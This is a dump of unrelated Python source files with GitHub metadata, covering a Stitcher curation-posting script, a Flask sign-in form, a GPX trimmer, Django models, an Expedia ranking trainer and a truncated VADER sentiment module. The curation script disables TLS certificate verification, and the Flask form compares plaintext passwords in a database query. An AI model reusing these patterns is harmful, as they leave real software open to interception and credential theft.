start = match.start(0) + classid.start(0) - sparing;
end = match.start(0) + classid.end(0) - sparing;
sparing += end - start - len(replacewith);
content = content[:start] + replacewith + content[end:];
totalsave += sparing;
file.seek(0);
file.write(content);
file.truncate();
file.close();
else:
print("Unknown file type: " + typ);
if savepairs:
file = open("classid-pairs.json", "w");
file.write(str(values).replace("'", "\""));
file.close();
print("Saved pairs of ids/classes to classid-pairs.json!");
print("\n\nDONE! Saved " + str(totalsave) + " characters (~" + str(totalsave / 1000) + "KB) in total"); | [
"noreply@github.com"
] | SirBaaron.noreply@github.com |
1c6b3570b0c358e73bb9eea4e802bdc09381cd82 | 41721635929286b2ef5a18de06591f9552912795 | /scripts/stitcher-curation/permuteCurations.py | 4d273b1b12784ee7a99af6ae1c8ef2949f8da2ba | [
"Apache-2.0"
] | permissive | ncats/stitcher | e46b64b9288f8c751d570f537c8d69f294d52527 | 31d67423060c1ea7e0b6ad25cb8ae83b6de25e4a | refs/heads/master | 2023-09-01T11:16:05.469707 | 2023-08-07T14:20:29 | 2023-08-07T14:20:29 | 217,080,716 | 12 | 8 | NOASSERTION | 2023-08-23T14:20:05 | 2019-10-23T14:40:42 | Java | UTF-8 | Python | false | false | 6,739 | py | #!/usr/bin/env python
import os
import sys
import cookielib
import urllib
import urllib2
import ssl
import json
import time
import argparse
site = "http://localhost:8080/"
cookies = cookielib.CookieJar()
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
opener = urllib2.build_opener(
urllib2.HTTPRedirectHandler(),
urllib2.HTTPHandler(debuglevel=0),
urllib2.HTTPSHandler(debuglevel=0, context=ctx),
urllib2.HTTPCookieProcessor(cookies))
opener.addheaders = [
('User-agent', ('Mozilla/4.0 (compatible; MSIE 6.0; '
'Windows NT 5.2; .NET CLR 1.1.4322)'))
]
def requestJson(uri):
try:
handle = opener.open(uri)
response = handle.read()
handle.close()
obj = json.loads(response)
return obj
except:
sys.stderr.write("failed: "+uri+"\n")
sys.stderr.flush()
time.sleep(5)
def applyCuration(sline):
obj = json.loads(sline[-1])
url = site[:-1]+obj['_uri']
for key in obj.keys():
if key[0] == "_": # do not post parameters created by API
del obj[key]
#print url, json.dumps(obj)
req = urllib2.Request(url, json.dumps(obj), {'Content-Type': 'application/json'})
try:
html = urllib2.urlopen(req, context=ctx)
sys.stderr.write(url+"\n")
resp = html.read()
sys.stderr.write(resp)
sys.stderr.write("\n")
r = json.loads(resp)
return r
except urllib2.HTTPError, e:
err = 'HTTP Error ERROR en el listado code => %s \n URL=> %s\n' % (e.code,url)
sys.stderr.write(err)
sys.exit()
except urllib2.URLError, e:
err = 'URL Error ERROR en el listado reason => %s \n URL=> %s\n' % (e.reason,url)
sys.stderr.write(err)
sys.exit()
return
def oldMain():
# check that the python version is correct (need 2)
if sys.version_info[0] > 2:
sys.stderr.write("Must be using Python 2! Aborting.\n")
sys.exit(1)
# check for arguments
args_p = argparse.ArgumentParser(description="Run Some Stitcher Tests")
args_p.add_argument('addr',
help="""a full Stitcher address OR
a shorthand: 'prod', 'dev', 'test' or 'local'""")
args_p.add_argument('--filename',
default="dbCurations.txt",
help="name of the file with curations to apply to stitcher database")
site_arg = args_p.parse_args().addr
filename = args_p.parse_args().filename
switcher = {
"prod": "https://stitcher.ncats.io/",
"dev": "https://stitcher-dev.ncats.io/",
"test": "https://stitcher-test.ncats.io/",
"local": "http://localhost:8080/"
}
if site_arg in switcher:
site = switcher[site_arg]
else:
site = site_arg
fp = open(filename, "r")
line = fp.readline()
while line != "":
applyCuration(line.split('\t'))
line = fp.readline()
fp.close()
example = """{"deltaId":1408,"nodeId":"KVS","nodeSource":"NCATS Pharmaceutical Collection, April 2012","node":368958,"operation":"add","jsonPath":"$['properties'][?(@['key']=='Synonyms' )]['value']","oldValue":null,"key":null,"value":"(R)-4-((E)-3-PHOSPHONOPROP-2-ENYL)PIPERAZINE-2-CARBOXYLIC ACID","stitches":"KVS","parentDataType":"object","dataType":"array","arrayIndex":null,"editor":"curator4 ","userName":"curator4","status":"approved","curationTimestamp":"12/15/2018","_ver":"1","_stitch":"KVS","_uri":"/api/stitches/latest/KVS/@update","_timestamp":1550001945101}"""
def getCuration(node, type, oldValue, value):
cur = dict()
operation = 'replace'
if value is None or value == '':
operation = 'remove'
elif oldValue is None or oldValue == '':
operation = 'add'
cur['stitches'] = node
cur['nodeSource'] = "DrugBank, July 2020"
cur['nodeId'] = node
cur['node'] = 368958
cur['jsonPath'] = "$['properties'][?(@['key']=='"+type+"' )]['value']"
cur['operation'] = operation
cur['oldValue'] = oldValue
cur['value'] = value
cur['_uri'] = "/api/stitches/latest/" + node + "/@testupdate"
#cur['key'] = None
#cur['parentDataType'] = "object"
#cur['dataType'] = "array"
#cur['arrayIndex'] = None
#cur['editor'] = "curator4 "
#cur['userName'] = "curator4"
#cur['status'] = "approved"
#cur['curationTimestamp'] = "12/15/2018"
return [json.dumps(cur)]
if __name__=="__main__":
uniis = dict()
names = dict()
for i in range(100, 150):
dbid = "DB%05d" % (i)
url = "http://localhost:8080/api/stitches/latest/" + dbid
print url
drug = requestJson(url)
if drug is not None:
for member in drug['sgroup']['members']:
if member['source'] == "DrugBank, July 2020" and member['id'] == dbid:
if 'stitches' in member:
if 'I_UNII' in member['stitches']:
if isinstance(member['stitches']['I_UNII'], list):
for unii in member['stitches']['I_UNII']:
uniis[dbid] = unii
else:
uniis[dbid] = member['stitches']['I_UNII']
if 'N_Name' in member['stitches']:
if isinstance(member['stitches']['N_Name'], list):
for name in member['stitches']['N_Name']:
names[dbid] = name
else:
names[dbid] = member['stitches']['N_Name']
print uniis
resps = dict()
errors = []
for unii1 in uniis.keys():
for unii2 in uniis.keys():
if unii1 != unii2 and uniis[unii1] != uniis[unii2]:
type = 'unii'
oldValue = uniis[unii1]
value = uniis[unii2]
curr = getCuration(unii1, type, oldValue, value)
print curr
resp = applyCuration(curr)
if 'statusMessage' in resp:
if resp['status'] == 'success':
if resp['statusMessage'] not in resps:
resps[resp['statusMessage']] = []
resps[resp['statusMessage']].append(unii1+":"+unii2)
else:
errors.append(resp['statusMessage'] + ":" + unii1 + ":" + unii2)
print unii1, unii2, resp
sys.exit()
print len(errors)
print errors
for key in resps.keys():
print key, len(resps[key]), resps[key]
| [
"southalln@mail.nih.gov"
] | southalln@mail.nih.gov |
c3025edb9e0a4bfafad31ec4def223cfdd8a6809 | 3cc2f47de6d78d610a2887f92bfba150b2994888 | /application/forms/account.py | b709a49955ab50546f45efab620eda042081cd50 | [] | no_license | fengliu222/blogbar | c8a66df586187d0a16063e4536e76d155863fe17 | ff6e7182f000777112101eed12ae9e2ca4298d25 | refs/heads/master | 2021-01-15T08:59:51.478354 | 2014-12-20T08:13:53 | 2014-12-20T08:13:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | # coding: utf-8
from flask_wtf import Form
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired, Email
from ..models import User
class SigninForm(Form):
"""Form for signin"""
email = StringField('邮箱',
validators=[
DataRequired(),
Email()
],
description='Email')
password = PasswordField('密码',
validators=[DataRequired()],
description='Password')
def validate_email(self, field):
user = User.query.filter(User.email == self.email.data).first()
if not user:
raise ValueError("Account doesn't exist.")
def validate_password(self, field):
if self.email.data:
user = User.query.filter(User.email == self.email.data,
User.password == self.password.data).first()
if not user:
raise ValueError('Password cannot match the Email.')
else:
self.user = user | [
"hustlzp@qq.com"
] | hustlzp@qq.com |
13c88e880ccb3f89764d544534eea28042a19294 | 0f29dbe2a5fca038167236438548d1471dae5b50 | /recognition/align/config.py | 763fce8cbb8615c93a3639c208de7ea2a17c29f9 | [] | no_license | causehhc/faceRecognition | f6697d3e71c1af7cbcc443262938f3a898f15a41 | c8f383f04377543c699a6480407597165f4f700b | refs/heads/master | 2023-05-24T08:27:18.436404 | 2021-06-11T03:57:04 | 2021-06-11T03:57:04 | 372,358,012 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | # 最小脸大小设定
min_face = 20
# 生成hard_example的batch
batches = [2048, 256, 16]
# pent对图像缩小倍数
stride = 2
# 三个网络的阈值
thresh = [0.6, 0.7, 0.7]
# 最后测试选择的网络
test_mode = 'ONet'
# 测试图片放置位置
test_dir = '../data/dataSet/CASIA-WebFace/'
# 测试输出位置
out_path = '../data/dataSet/casia_mtcnn_182/'
# 一张图是否获取多张脸
detect_multiple_faces = False
# 输出图片大小
image_size = 182
| [
"1005694755@qq.com"
] | 1005694755@qq.com |
60d0ccdfddcc2d5a1734c0556773833430a4f48e | 1f9b62c9573c6268539a6a799e6ace5e58b9a6d4 | /trim_gpx.py | dcf4d70670ae26d92ce0d2a0ac09890910ace26d | [
"MIT"
] | permissive | jodysankey/scripts | 647ecc8e42c631c30d7603481d88bc1f2b039e1d | cec8fae0c1872bbd91b244775bee18d5db831581 | refs/heads/master | 2023-07-21T08:44:19.956073 | 2023-07-04T07:00:41 | 2023-07-04T07:00:41 | 236,669,332 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,175 | py | #!/bin/python3
"""Script to analyze two Navionics GPS tracks during crew overboard
manoeuvres, one from the boat, one from the 'crew'. Run with --help
to see the command line options."""
#==============================================================
# Copyright Jody M Sankey 2022
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENCE.md file for details.
#==============================================================
# AppliesTo: linux
# AppliesTo: client
# RemoveExtension: True
# PublicPermissions: True
#==============================================================
import argparse
import datetime as dt
import math as m
import os.path
import xml.etree.ElementTree as ElementTree
NS = {'': 'http://www.topografix.com/GPX/1/1'}
# Assorted conversion constants.
M_PER_DEGREE_LAT = 1852 * 60
FT_PER_M = 3.281
class Point:
"""A single point on a track segment."""
def __init__(self, xml_point):
xml_time = xml_point.find('time', NS)
self.time = dt.datetime.fromisoformat(xml_time.text[:-1]+'+00:00').astimezone()
self.lat = float(xml_point.attrib['lat'])
self.long = float(xml_point.attrib['lon'])
self.xml = xml_point
def __str__(self):
return f'{self.time} lat={self.lat}/long={self.long}'
def pos_string(self):
"""Returns a string describing the position of this point."""
return "{}°{:06.3f}'{} {}°{:06.3f}'{}".format(
int(abs(self.lat)), (abs(self.lat)%1)*60, 'N' if self.lat > 0 else 'S',
int(abs(self.long)), (abs(self.long)%1)*60, 'E' if self.long > 0 else 'W')
def date_pos_string(self):
"""Returns a string describing the datetime and position of this point."""
return '{} at {}'.format(self.time.strftime('%Y-%m-%d %H%M'), self.pos_string())
def distance_from(self, other):
"""Returns the distance of this point from other in meters."""
dlat_m = (self.lat - other.lat) * M_PER_DEGREE_LAT
dlong_m = (self.long - other.long) * M_PER_DEGREE_LAT * m.cos(m.radians(other.lat))
return m.sqrt(m.pow(dlat_m, 2) + m.pow(dlong_m, 2))
def rounded_lat_long(self):
"""Returns the (lat, long) of this point rounded to a ~1 meter resolution."""
return (round(self.lat, 5), round(self.long, 5))
class PointRange:
"""A start and end index into a list of points."""
def __init__(self, points, start, end):
self.points = points
self.start = start
self.end = end
self.rounded = {p.rounded_lat_long() for p in points[start:end+1]}
def __str__(self):
return '{}-{} near {}'.format(self.points[self.start].time.strftime('%H%M'),
self.points[self.end].time.strftime('%H%M'),
self.points[self.start].pos_string())
@property
def duration(self):
"""Returns the duration between the first and last points in this range."""
return self.points[self.end].time - self.points[self.start].time
def point_within_distance(self, point, distance):
"""Returns True if the point (rounded) is within distance of all points in this range."""
point_rounded = point.rounded_lat_long()
for range_rounded in self.rounded:
dlat_m = (range_rounded[0] - point_rounded[0]) * M_PER_DEGREE_LAT
dlong_m = ((range_rounded[1] - point_rounded[1]) * M_PER_DEGREE_LAT
* m.cos(m.radians(point_rounded[0])))
if m.sqrt(m.pow(dlat_m, 2) + m.pow(dlong_m, 2)) > distance:
return False
return True
def last_index_where_point_is_outside_distance(self, point, distance):
"""Returns the last index in this range at which the supplied point is outside distance,
or None is its within distance of the entire range."""
for compare_idx in range(self.end, self.start-1, -1):
if point.distance_from(self.points[compare_idx]) > distance:
return compare_idx
return None
def increment_end(self):
"""Increases the size of this range by one point at the end."""
self.end += 1
self.rounded.add(self.points[self.end].rounded_lat_long())
def overlaps(self, other):
"""Returns true if this range overlaps other."""
return not (self.start > other.end or self.end < other.start)
class Track:
"""The interpreted contexts of a GPX file."""
def __init__(self, filename):
self.tree = ElementTree.parse(filename)
self.points = []
xml_track = self.tree.getroot().find('trk', NS)
self.xml_segment = xml_track.find('trkseg', NS)
for xml_point in self.xml_segment.findall('trkpt', NS):
self.points.append(Point(xml_point))
def get_stationary_ranges(self, args):
"""Returns a list of PointRange objects for times in the track where we appear stationery
based on thresholds supplied in args."""
ranges = []
potential = None
current = PointRange(self.points, 0, 0)
for idx, point in enumerate(self.points):
# If the new point is inside the current range just extend the range and we're done.
if current.point_within_distance(point, args.distance):
current.increment_end()
continue
# This point is not close to the set of rounded values in the current range, find
# the latest place in the range we're in disagreement with.
outside_idx = current.last_index_where_point_is_outside_distance(point, args.distance)
if outside_idx is not None:
if current.duration > args.time:
# We're about to forget a current range that was potentially viable.
if not potential:
# If we didn't have a previous viable range use this.
potential = current
elif not current.overlaps(potential):
# If this doesn't touch the previous viable range we found, that previous
# viable range should be included in the output.
ranges.append(potential)
potential = current
elif current.duration > potential.duration:
# If this is longer than an the previous one and overlaps the previous one
# it is a better candidate to be potentially included in the results.
potential = current
# The new current range is everything we matched after the first mismatch.
current = PointRange(self.points, outside_idx+1, idx)
else:
# Is it technically possible to not be outside and point because we used rounded
# positions before for speed. If so just extend the range.
current.increment_end()
# After the loop, include any eligible range we've not yet added
if potential:
ranges.append(potential)
return ranges
def trim(self, start, end):
"""Delete all points outside the supplied indices and update times to match."""
# Update the custom Navionics time propertied if they exist.
ext = self.xml_segment.find('extensions', NS)
if ext and ext.find('navionics_start_time', NS):
ext.find('navionics_start_time', NS).text = self.points[start].xml.find('time', NS).text
if ext and ext.find('navionics_end_time', NS):
ext.find('navionics_end_time', NS).text = self.points[end].xml.find('time', NS).text
# Delete any points outside the time range.
start_time = self.points[start].time
end_time = self.points[end].time
for point in self.points:
if point.time < start_time or point.time > end_time:
self.xml_segment.remove(point.xml)
def save(self, filename):
"""Outputs the track to the supplied filename."""
ElementTree.register_namespace('', NS[''])
self.tree.write(filename, xml_declaration=True, encoding='UTF-8')
def output_filename(input_filename):
"""Returns the default output filename to use for the supplied input filename."""
base, ext = os.path.splitext(input_filename)
return base + '_trimmed' + ext
def create_parser():
"""Creates the definition of the expected command line flags."""
def file_if_valid(parser, arg):
if not os.path.exists(arg):
parser.error(f'{arg} does not exist')
return None
return arg
def seconds(arg):
return dt.timedelta(seconds=arg)
def ft_to_m(arg):
return int(arg / FT_PER_M)
parser = argparse.ArgumentParser(
description='Script to interactively trim a Navionics GPS tracks to the time of motion.'
'NOTE: This uses the Python ElementTree parser which is not secure against '
'malicious inputs. Please be sure you trust whatever generated your input '
'track files.',
epilog='Copyright Jody Sankey 2022')
parser.add_argument('input', metavar='TRACK_FILE', type=lambda x: file_if_valid(parser, x),
help='A GPX track file.')
parser.add_argument('output', metavar='OUT_FILE', nargs='?', default=None, help='The output '
'filename, if omitted filename will be derived from the input.')
# Note we ask the user to supply the distance in FT to match our UI, but internally use meters.
parser.add_argument('-d', '--distance', metavar='FT', action='store', default=50, type=ft_to_m,
help='Distance threshold to determine stationary.')
parser.add_argument('-t', '--time', metavar="SEC", action='store', type=seconds,
default=dt.timedelta(seconds=300),
help='Time (in seconds) to determine stationary.')
return parser
def main():
"""Executes the script using command line arguments."""
args = create_parser().parse_args()
print('Parsing track...')
track = Track(args.input)
ranges = track.get_stationary_ranges(args)
print('Track contains the following events:')
print(' 0: Track starts {}'.format(track.points[0].date_pos_string()))
for i, rng in enumerate(ranges):
print(' {}: Stationary {}'.format(i+1, rng))
print(' {}: Track ends {}'.format(len(ranges)+1, track.points[-1].date_pos_string()))
start_evt = int(input('Which of these events should be the new start of the file? '))
start_idx = 0 if start_evt == 0 else ranges[start_evt-1].end
end_evt = int(input('Which of these events should be the new end of the file? '))
end_idx = len(track.points)-1 if start_evt == len(ranges)+1 else ranges[end_evt-1].start
output = output_filename(args.input) if args.output is None else args.output
track.trim(start_idx, end_idx)
track.save(output)
print('Wrote modified track to {}'.format(output))
if __name__ == '__main__':
main()
| [
"jody@jsankey.com"
] | jody@jsankey.com |
3620bb985342eb123684c4a32d71bb3c4ebf82a0 | 1ef7dfdb5ed2bbe4dabad4c957e3fe7632e0a6d0 | /hospitals/models.py | cd850a4ee059d2225fcf3921bb5b2dbc12e900da | [
"MIT"
] | permissive | mn-ahmed/geodjango-hospitals-api | 4747a837f8d853c71442bf331d878a1a56104184 | 3a816a47af266fd93a9aa532132515999feaacdc | refs/heads/master | 2023-04-03T02:31:32.591678 | 2021-04-11T11:20:48 | 2021-04-11T11:20:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | from django.contrib.gis.db import models
from django.utils.translation import gettext_lazy as _
class Hospital(models.Model):
name = models.CharField(_("Hospital Name"), max_length=100)
lon = models.FloatField(_("Longitude"))
lat = models.FloatField(_("Latitude"))
fid = models.IntegerField(_("Field ID"))
beds = models.IntegerField(_("Bed Numbers"), default=1)
province_name = models.CharField(_("Province"), max_length=100)
province_code = models.CharField(_("Province Code"), max_length=1)
geom = models.PointField(srid=4326)
def __str__(self):
return self.name
| [
"alphaogilo@gmail.com"
] | alphaogilo@gmail.com |
ed5b5f0ce15b2c011afe31a4fa5d2555b2f19e89 | 30b74faf5c79e66699e549aed2dfb532c4e05f78 | /uploader/helpers.py | 992bea3842e7cf12ad647e76e708527330e1d139 | [] | no_license | carlosaguilarGL/hackerrank_uploader | a0319cf4cd49458a92bcda25efae09573f42885c | 6feda33f3a1f562bfd359799e9f41e2e7b48f223 | refs/heads/master | 2023-03-05T20:24:45.107171 | 2021-02-12T20:47:32 | 2021-02-12T20:47:32 | 337,779,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,465 | py | from .models import Question, Option
import csv
from django.db import transaction
@transaction.atomic
def create_questions(content):
"""
Create Questions and Options from a CSV content stream.
This method is not optimized for large amount of questions since it
creates the questions 1 by 1
"""
questions = []
letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']
skip_status = ['done', 'skip']
for row in csv.DictReader(content):
if row['Status'].lower() in skip_status:
continue
answers = row['Answers']
hr_id = None
try:
question = Question.objects.get(name=row['Name'])
hr_id = question.hr_id
question.delete()
except Question.DoesNotExist:
pass
finally:
question = Question.objects.create(
name=row['Name'],
tags=row['Tags'],
recommended_time=row['Recommended_time'],
description=row['Description'],
score=row['Score'],
hr_id=hr_id
)
question.option_set.set([
Option.objects.create(
letter=letter,
text=row[letter],
is_answer=letter in answers,
question=question
)
for letter in letters if letter in row and row[letter]
])
questions.append(question)
return questions | [
"carlos.aguilar@gorillalogic.com"
] | carlos.aguilar@gorillalogic.com |
66457420921a99d9003f951d8dd379354cc20c03 | 4e27996c2045ac0f7e3241e5cb4194731b0726f1 | /Tech Blog Scraping/website7/website7/website7/spiders/tech7.py | d7e5e60ab74118c5b15f8f2b6f3b45f6fcd1befd | [] | no_license | VaibhavDN/Websec | 1264a573062a2eb63d06f90044ab49122ee02bc6 | a9e30e68145af3d64dd38e50d50a2de34c61400a | refs/heads/master | 2021-07-09T18:35:33.053070 | 2020-09-21T17:21:30 | 2020-09-21T17:21:30 | 203,001,579 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | # -*- coding: utf-8 -*-
import scrapy
import request
import response
from ..items import Website7Item
class Tech5Spider(scrapy.Spider):
name = 'tech7'
start_urls = ['https://www.nytimes.com/section/technology']
def parse(self, response):
items=Website7Item()
text=response.css('.e1xfvim30 , .e1xdw5350 a , .e1xdw5352 a').css('::text').extract()
items['text']=text
yield items | [
"princebest3@rediffmail.com"
] | princebest3@rediffmail.com |
b9bc24ae50a0a73ab58acdb4bcb32c164927eb81 | 84ca82df3cbabad2aa5f007ccfff0f259f6768e5 | /tileservermapping/mapping/migrations/0006_auto_20181226_1555.py | 29aa1b41a04ce6f1151f8a712bfb8fe1b23ba663 | [
"MIT"
] | permissive | Map-Data/tileserver-mapping | c98bf1a17ac254b45f21992a6582d19f7d0d54c2 | 85292f28a65b174c07193e6f54ae488c667e96dd | refs/heads/master | 2022-12-12T15:13:43.870424 | 2020-05-29T11:21:33 | 2020-05-29T11:21:33 | 238,496,733 | 0 | 0 | MIT | 2021-09-22T18:35:36 | 2020-02-05T16:30:48 | Python | UTF-8 | Python | false | false | 740 | py | # Generated by Django 2.0.6 on 2018-12-26 15:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mapping', '0005_auto_20181226_1522'),
]
operations = [
migrations.AlterField(
model_name='server',
name='url_postfix',
field=models.CharField(blank=True, default='', max_length=200),
),
migrations.AddIndex(
model_name='server',
index=models.Index(fields=['z', 'x', 'y'], name='mapping_ser_z_5c1e4a_idx'),
),
migrations.AddIndex(
model_name='server',
index=models.Index(fields=['active'], name='mapping_ser_active_87086c_idx'),
),
]
| [
"dev@finn-thorben.me"
] | dev@finn-thorben.me |
f01735b659f15565c53914ee8c4bc8dbab4ea233 | 02a40301ff95e2e41adce83c417247c8afb9c75c | /ICDM2013-Expedia-Recommendation-System-master/ICDM2013-Expedia-Recommendation-System-master/pythoncode/train2.py | 6c16c6099adaf0e37211207904efdd6cdb8933fd | [] | no_license | kasrad/MThesis | 33164e19cf828be80543f3a4ca702fa0ded19d2c | f25239e6fb800d7c2f344e589d3fbfc671b8f77f | refs/heads/master | 2021-01-25T09:45:10.326785 | 2018-04-13T11:33:21 | 2018-04-13T11:33:21 | 123,317,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,110 | py | import sys
import data_io
import model
import pandas as pd
import random
from sklearn.ensemble import RandomForestClassifier
from datetime import datetime
def get_features(train, isBook=True):
feature_names = list(train.columns)[:27]
if "comp1_rate" in feature_names:
## only true in the test set
feature_names.remove("comp1_rate")
if "position" in feature_names:
## only true in the training set
feature_names.remove("position")
feature_names.remove("date_time")
feature_names.remove("srch_id")
feature_names.remove("visitor_hist_starrating")
if isBook:
feature_names.append("visitor_hist_starrating_bool")
feature_names.append("comp_rate_sum")
feature_names.append("comp_inv_sum")
return feature_names
def feature_eng(train):
## deal with NAs in hotels's infor
train['prop_review_score'].fillna(3, inplace=True)
train['prop_review_score'][train['prop_review_score']==0]=2.5
train["prop_location_score2"].fillna(0, inplace=True)
avg_srch_score = train["srch_query_affinity_score"].mean()
train["srch_query_affinity_score"].fillna(avg_srch_score, inplace=True)
train["orig_destination_distance"].fillna(1509,inplace=True)
train["visitor_hist_adr_usd"].fillna(0, inplace=True)
train['visitor_hist_starrating_bool'] = pd.notnull(train['visitor_hist_starrating'])
## add feature: comp_rate_sum
for i in range(1,9):
train['comp'+str(i)+'_rate'].fillna(0, inplace=True)
train['comp_rate_sum'] = train['comp1_rate']
for i in range(2,9):
train['comp_rate_sum'] += train['comp'+str(i)+'_rate']
## add feature: comp_rate_sum
for i in range(1,9):
train['comp'+str(i)+'_inv'].fillna(0, inplace=True)
train['comp'+str(i)+'_inv'][train['comp'+str(i)+'_inv']==1] = 10
train['comp'+str(i)+'_inv'][train['comp'+str(i)+'_inv']==-1] = 1
train['comp'+str(i)+'_inv'][train['comp'+str(i)+'_inv']==0] = -1
train['comp'+str(i)+'_inv'][train['comp'+str(i)+'_inv']==10] = 0
train['comp_inv_sum'] = train['comp1_inv']
for i in range(2,9):
train['comp_inv_sum'] += train['comp'+str(i)+'_inv']
def main():
sample_size = int(sys.argv[1])
## sample_size = int(1000)
train = data_io.read_train()
print("Data Size:")
print(train.shape)
feature_eng(train)
## originally sample size = 100000
train_set = train[:sample_size]
book_trainset = train_set[train_set['booking_bool']==1]
book_rows = book_trainset.index.tolist()
bsize = len(book_trainset.index)
click_trainset = train_set[train_set['click_bool']==1]
click_rows = click_trainset.index.tolist()
csize = len(click_trainset.index)
print 'bsize ' + str(bsize)
print 'csize ' + str(csize)
book_trainset = book_trainset.append(train_set.ix[random.sample(train_set.drop(book_rows).index, bsize)])
click_trainset =click_trainset.append(train_set.ix[random.sample(train_set.drop(click_rows).index, csize)])
## Train the booking model
for i in range(0,2):
if i==0:
model_name = "Booking"
response_name = "booking_bool"
train_sample = book_trainset
isBook = True
else:
model_name = "Click"
response_name = "click_bool"
train_sample = click_trainset
isBook = False
print("Training the "+model_name+" Classifier...")
tstart = datetime.now()
feature_names = get_features(train_sample, isBook)
print("Using "+str(len(feature_names))+" features...")
features = train_sample[feature_names].values
target = train_sample[response_name].values
classifier = model.model()
classifier.fit(features, target)
# print the time interval
print("Time used,")
print datetime.now() - tstart
print("Saving the classifier...")
tstart = datetime.now()
data_io.save_model(classifier, isBook)
print("Time used,")
print datetime.now() - tstart
if __name__=="__main__":
main()
| [
"radim248@gmail.com"
] | radim248@gmail.com |
8d3c1b8bce69b57d0d51802846a66c1e439b70e4 | ca4faa1c6d4d87d1702b2c42a64ea6a063d71de9 | /q2_micom/_transform.py | bc96be1fc23acd5496509e2495ad09d70dc7cd8b | [
"Apache-2.0"
] | permissive | Gibbons-Lab/q2-micom | cb0ed1185a50248eae94a415e03443dbacfa8bfb | 2d954d4f584675c29aa2eccb5245e4469f1740b6 | refs/heads/master | 2020-12-07T08:48:10.020690 | 2020-01-07T23:27:39 | 2020-01-07T23:27:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,558 | py | """Transformers for MICOM types."""
import pandas as pd
from q2_micom.plugin_setup import plugin
import q2_micom._formats_and_types as ft
@plugin.register_transformer
def _1(data: pd.DataFrame) -> ft.MicomMediumFile:
mm = ft.MicomMediumFile()
data.to_csv(str(mm), index=False)
return mm
@plugin.register_transformer
def _2(mm: ft.MicomMediumFile) -> pd.DataFrame:
return pd.read_csv(str(mm), index_col=False)
@plugin.register_transformer
def _3(data: pd.DataFrame) -> ft.ModelManifest:
sbm = ft.SBMLManifest()
data.to_csv(str(sbm), index=False)
return sbm
@plugin.register_transformer
def _4(sbm: ft.ModelManifest) -> pd.DataFrame:
return pd.read_csv(str(sbm), index_col=False)
@plugin.register_transformer
def _5(data: pd.DataFrame) -> ft.CommunityModelManifest:
cmm = ft.CommunityModelManifest()
data.to_csv(str(cmm), index=False)
return cmm
@plugin.register_transformer
def _6(cmm: ft.CommunityModelManifest) -> pd.DataFrame:
return pd.read_csv(str(cmm), index_col=False)
@plugin.register_transformer
def _7(data: pd.DataFrame) -> ft.GrowthRates:
gr = ft.GrowthRates()
data.to_csv(str(gr), index=False)
return gr
@plugin.register_transformer
def _8(gr: ft.GrowthRates) -> pd.DataFrame:
return pd.read_csv(str(gr), index_col=False)
@plugin.register_transformer
def _9(data: pd.DataFrame) -> ft.Fluxes:
ef = ft.Fluxes()
data.to_parquet(str(ef))
return ef
@plugin.register_transformer
def _10(ef: ft.Fluxes) -> pd.DataFrame:
return pd.read_parquet(str(ef))
| [
"ch.diener@gmail.com"
] | ch.diener@gmail.com |
2b1845f43f88f2094ba18076d42a03c3206e6743 | e75f2c2bc9ce85c9be1e0c4f6cdc3285589476de | /vader.py | 47e4ee3163e3298307140c9d067bf65f7f936e10 | [] | no_license | JeongWonJo/emojiRecommendation | 7ba68d13e3ae9a4c902ed3dccca486433e7da9ce | 9597e26686601750acf368b75bec0e0805162e27 | refs/heads/master | 2020-03-27T19:17:53.453708 | 2018-12-08T01:50:23 | 2018-12-08T01:50:23 | 146,979,229 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,865 | py | """
If you use the VADER sentiment analysis tools, please cite:
Hutto, C.J. & Gilbert, E.E. (2014). VADER: A Parsimonious Rule-based Model for
Sentiment Analysis of Social Media Text. Eighth International Conference on
Weblogs and Social Media (ICWSM-14). Ann Arbor, MI, June 2014.
"""
input=raw_input
import nltk
import math, re, string, requests, json
from itertools import product
from inspect import getsourcefile
from os.path import abspath, join, dirname
##Constants##
# (empirically derived mean sentiment intensity rating increase for booster words)
B_INCR = 0.293
B_DECR = -0.293
# (empirically derived mean sentiment intensity rating increase for using
# ALLCAPs to emphasize a word)
C_INCR = 0.733
N_SCALAR = -0.74
# for removing punctuation
REGEX_REMOVE_PUNCTUATION = re.compile('[%s]' % re.escape(string.punctuation))
PUNC_LIST = [".", "!", "?", ",", ";", ":", "-", "'", "\"",
"!!", "!!!", "??", "???", "?!?", "!?!", "?!?!", "!?!?"]
NEGATE = \
["aint", "arent", "cannot", "cant", "couldnt", "darent", "didnt", "doesnt",
"ain't", "aren't", "can't", "couldn't", "daren't", "didn't", "doesn't",
"dont", "hadnt", "hasnt", "havent", "isnt", "mightnt", "mustnt", "neither",
"don't", "hadn't", "hasn't", "haven't", "isn't", "mightn't", "mustn't",
"neednt", "needn't", "never", "none", "nope", "nor", "not", "nothing", "nowhere",
"oughtnt", "shant", "shouldnt", "uhuh", "wasnt", "werent",
"oughtn't", "shan't", "shouldn't", "uh-uh", "wasn't", "weren't",
"without", "wont", "wouldnt", "won't", "wouldn't", "rarely", "seldom", "despite"]
# booster/dampener 'intensifiers' or 'degree adverbs'
# http://en.wiktionary.org/wiki/Category:English_degree_adverbs
BOOSTER_DICT = \
{"absolutely": B_INCR, "amazingly": B_INCR, "awfully": B_INCR, "completely": B_INCR, "considerably": B_INCR,
"decidedly": B_INCR, "deeply": B_INCR, "effing": B_INCR, "enormously": B_INCR,
"entirely": B_INCR, "especially": B_INCR, "exceptionally": B_INCR, "extremely": B_INCR,
"fabulously": B_INCR, "flipping": B_INCR, "flippin": B_INCR,
"fricking": B_INCR, "frickin": B_INCR, "frigging": B_INCR, "friggin": B_INCR, "fully": B_INCR, "fucking": B_INCR,
